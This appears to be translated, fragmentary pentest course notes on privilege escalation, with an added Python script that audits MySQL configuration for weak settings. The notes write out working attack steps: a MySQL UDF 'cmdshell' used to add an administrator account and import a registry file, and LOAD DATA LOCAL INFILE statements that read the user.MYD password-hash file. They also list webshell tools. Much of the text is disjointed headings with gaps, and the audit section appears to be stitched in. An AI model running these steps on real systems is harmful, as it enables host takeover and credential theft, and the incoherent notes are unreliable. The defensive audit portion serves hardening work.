Penetration test - right raising topic
2022-06-23 14:07:00 【amingMM】
- 05 Privilege escalation and intranet penetration
- MySQL users without the FILE privilege: getting the root password from a low-privilege account
- Windows SMB replay / relay exploitation
- CTF: difficult kernel privilege escalation
- Windows EXP privilege escalation
- EXP overflow privilege escalation (techniques / accessibility privileges cannot be used)
- Dealing with the problem of VirtualBox connecting to the physical machine
- Setting up the environment
- mysql 5.1: Linux privilege escalation
- #1 Simple deep strike
- Chapter 1: A first look at privilege escalation
05 Privilege escalation and intranet penetration
Chapter 3: Database privilege escalation
Section 1: SQL Server database vulnerability exploitation and privilege escalation
dbo privilege: can back up the database, but cannot execute commands
SESHELL
mdb: registry operations, command execution
Section 2: MySQL database vulnerabilities and privilege escalation


Privilege escalation under the mysql root account
Installation problem:
by default it is installed as the system administrator
and started as a service
Backing up the database produces a file




MOF (timed) privilege escalation


Execute commands remotely and bounce a reverse shell back (the attacker listens on a port)
UDF: executing system commands
● Linux UDF
Obtain an administrator shell on the target through the database, going from low privilege to high privilege.
Built-in functions: sleep(), sum(), ascii()
User-defined functions (UDF):
functions you write yourself for convenience. A UDF has one of 3 return types,
namely STRING (character), INTEGER (integer) and REAL (real).
- Prerequisites: control a mysql database account that has INSERT and DELETE privileges on the mysql database (needed to create and drop functions), plus permission to write udf.dll into the corresponding directory.
  For versions above 5.1, udf.dll is placed in the lib\plugin folder of the mysql installation directory to create custom functions. The directory does not exist by default and must be created by hand: create the lib\plugin folder in the installation directory, then export udf.dll into it.
- Windows prerequisites
  mysql version greater than 5.1:
  the udf.dll file must be placed in the lib\plugin folder of the mysql installation directory.
  mysql version less than 5.1:
  on Windows Server 2003, drop the udf.dll file into the c:\windows\system32 directory;
  on Windows Server 2000, place it under the c:\winnt\system32 directory.

First, check whether MySQL is 32-bit or 64-bit. There are several ways to see this:
mysql -V
mysql --version
Or, inside the MySQL database, run:
show variables like '%datadir%';
-- C:\ProgramData\MySQL\MySQL Server 5.7\Data\
show variables like '%version_%';


create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user iis_user [email protected]#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:\web\3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');
Requires root privilege.
MOF is a vulnerability that comes with the Windows system itself.
MySQL users without the FILE privilege: getting the root password from a low-privilege account
MySQL exploitation (beyond-privilege access: getting the root password from a low-privilege account)
load_file cannot be used to read files,
nor can into dumpfile or into outfile be used to write files.
With load data infile, local files can be read into the database, so under low privilege this bug lets us read files on the server.
Read the mysql database files: the user table in the mysql library contains every user's password hash.

LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user.MYD' INTO TABLE test2 fields terminated by '';
select * from test2;

Open the user.MYD file with WinHex.
It is truncated at the 00 character, so the later entries never make it into the database.
Let's try to get around this limitation.
After several attempts we found that appending LINES TERMINATED BY '' does the job; the truncation character is then treated as a separator. The complete statement:
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user2.MYD' INTO TABLE test2 fields terminated by '' LINES TERMINATED BY '';
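Both of the MySQL techniques in these notes, the UDF plugin load and the LOAD DATA LOCAL INFILE read of user.MYD, depend on server configuration rather than on a bug, so a defender can check for the enabling settings directly. The following Python script is an added example and is not part of the original notes: it parses the [mysqld] section of a my.cnf / my.ini, reports each weak setting next to its hardened value, and shows a constructed weak configuration beside the corrected one. The option names (local_infile, secure_file_priv, plugin_dir, datadir, user) are real MySQL server options; the file contents and paths are constructed for the example.

```python
"""Audit a MySQL [mysqld] config for the settings behind UDF and LOAD DATA LOCAL abuse.

Added example, not from the original notes. Option names are MySQL's own;
the two config texts below are constructed sample input.
"""
import configparser
import os

# Constructed sample: a default-style Windows install like the one in the notes,
# with a plugin directory that sits inside datadir (so the server can write to it).
WEAK_CONFIG = """
[mysqld]
basedir=C:/Program Files/MySQL/MySQL Server 5.7
datadir=C:/ProgramData/MySQL/MySQL Server 5.7/Data
plugin_dir=C:/ProgramData/MySQL/MySQL Server 5.7/Data/plugin
local_infile=1
secure_file_priv=
"""

# The same file with the settings corrected.
HARDENED_CONFIG = """
[mysqld]
basedir=C:/Program Files/MySQL/MySQL Server 5.7
datadir=C:/ProgramData/MySQL/MySQL Server 5.7/Data
plugin_dir=C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin
local_infile=0
secure_file_priv=NULL
"""

ON_VALUES = {"1", "on", "true"}


def load_mysqld_section(text):
    """Return the [mysqld] options as a dict; MySQL treats '-' and '_' in names alike."""
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None,
                                       delimiters=("=",))
    parser.read_string(text)
    if not parser.has_section("mysqld"):
        return {}
    return {k.replace("-", "_"): (v or "").strip() for k, v in parser.items("mysqld")}


def _is_inside(path, parent):
    """True when path lies under parent (string comparison on normalised paths)."""
    p = os.path.normcase(os.path.normpath(path))
    q = os.path.normcase(os.path.normpath(parent))
    return p.startswith(q.rstrip(os.sep) + os.sep) or p.startswith(q.rstrip("/") + "/")


def audit_mysqld_config(text):
    """Return (option, current value, recommended value, reason) for each weak setting."""
    opts = load_mysqld_section(text)
    findings = []

    # local_infile governs LOAD DATA LOCAL INFILE: the read of user.MYD in the notes.
    local_infile = opts.get("local_infile")
    if local_infile is None:
        findings.append(("local_infile", "<unset: defaults to ON before MySQL 8.0>", "0",
                         "LOAD DATA LOCAL INFILE can pull readable files into a table"))
    elif local_infile.lower() in ON_VALUES:
        findings.append(("local_infile", local_infile, "0",
                         "LOAD DATA LOCAL INFILE can pull readable files into a table"))

    # secure_file_priv governs LOAD_FILE(), INTO OUTFILE/DUMPFILE and server-side LOAD DATA.
    sfp = opts.get("secure_file_priv")
    if sfp is None:
        findings.append(("secure_file_priv", "<unset: platform-dependent default>", "NULL",
                         "set NULL to disable file import/export, or pin it to one directory"))
    elif sfp == "":
        findings.append(("secure_file_priv", "<empty: unrestricted>", "NULL",
                         "empty value lets INTO DUMPFILE drop a library anywhere mysqld can write"))

    # CREATE FUNCTION ... SONAME loads only from plugin_dir, so it must not be server-writable.
    plugin_dir = opts.get("plugin_dir")
    datadir = opts.get("datadir")
    if plugin_dir and datadir and _is_inside(plugin_dir, datadir):
        findings.append(("plugin_dir", plugin_dir, "a directory outside datadir, not writable by mysqld",
                         "a plugin_dir under datadir is writable by the server process"))
    # Live permission check, only meaningful when run on the host where the path exists.
    if plugin_dir and os.path.isdir(plugin_dir) and os.access(plugin_dir, os.W_OK):
        findings.append(("plugin_dir", plugin_dir, "remove write access for the mysqld account",
                         "this process can write into plugin_dir"))

    # The notes describe the service running as the system administrator.
    if opts.get("user", "").lower() in {"root", "system", "localsystem"}:
        findings.append(("user", opts["user"], "a dedicated low-privilege service account",
                         "any command execution via UDF inherits the service account"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label} config: {len(audit_mysqld_config(cfg))} finding(s)")
        for option, current, recommended, reason in audit_mysqld_config(cfg):
            print(f"  {option}: {current!r} -> {recommended} ({reason})")
```

Running the script reports three findings for the weak file (local_infile, secure_file_priv and plugin_dir) and none for the hardened one. The same checks can be run against a live server by feeding it the output of SHOW VARIABLES for those option names; the config-file form is used here so the example runs offline.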

Windows SMB replay / relay exploitation
CTF: difficult kernel privilege escalation
Windows EXP privilege escalation
EXP overflow privilege escalation (techniques / accessibility privileges cannot be used)
exploit -> Windows overflow exploitation
shell connection
Virtual connection privileges
- China Chopper (中国菜刀)
- AntSword (蚁剑)
- Big Trojan (大马) shell: execute the command dir
One-line Trojan (一句话木马) privilege escalation


Dealing with the problem of VirtualBox connecting to the physical machine

Setting up the environment





- View privileges: whoami, systeminfo (patches)
- Add privileges: net user xxx xxx /add, net localgroup
- Check ports: tasklist /svc, netstat -ano



- Make do: go look at the files on the C drive


- Check out the patches

- Patches: leave them for now
- Do as you please



- Found a tool by accident
mysql 5.1: Linux privilege escalation
#1 Simple deep strike

Scan assets for weak passwords: FTP, MySQL, Redis, SSH, RPC



Because of root privilege: from low to high privilege, UDF privilege escalation
i春秋\05 Privilege escalation and intranet penetration\
Chapter 1: A first look at privilege escalation
Section 1: Overview of privilege escalation
Basic commands
Check logged-in users: query user
Dirty COW vulnerability
Third-party software privilege escalation: pr privilege escalation
Database privilege escalation
sqlserver: SA, xp_cmdshell
mysql: udf plugin privilege escalation, MOF file replacement privilege escalation
dll file loading
ftp typewriting, vnc configuration
typewriting: replace the exe, restart, automatic loading
- webshell: privileges depend on the account the middleware was installed under

Section 2: Privilege escalation based on password cracking


Hash capture and cracking


LAN: ARP, DNS hijacking, sniffing